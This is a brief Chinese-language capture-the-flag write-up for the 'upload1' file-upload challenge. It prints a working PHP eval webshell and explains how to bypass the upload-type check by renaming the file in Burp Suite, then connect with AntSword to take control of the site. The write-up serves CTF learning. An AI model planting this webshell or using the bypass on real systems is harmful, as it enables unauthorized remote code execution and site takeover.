题目

 

看到文件上传的一般思路是：构建一句话木马，利用bp修改包后缀名（一般会限制上传文件类型），上传成功以后注意文件位置，利用菜刀或者是中国蚁剑进行连接， 然后获得flag

构建一句话木马

<?php 
@eval($_POST['123']);
echo('123');
?>

然后修改后缀名为jpg

 

用bp进行拦截后，修改为php后缀，上传成功

 访问一下有没有上传成功 

 

使用蚁剑进行链接

 获得网站权限

一般在网站根目录找找就能找到flag

 

参考文章：

攻防世界-upload1-(详细操作)做题笔记_角一角的博客-CSDN博客